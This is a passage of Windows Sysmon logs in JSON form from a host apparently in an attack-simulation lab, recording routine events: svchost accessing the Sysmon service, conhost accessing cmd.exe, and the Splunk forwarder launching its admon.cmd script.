06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001006BC0500}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001006BC0500}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.656\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-001009BE0500}\r\nProcessId: 4384\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.656","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-001009BE0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
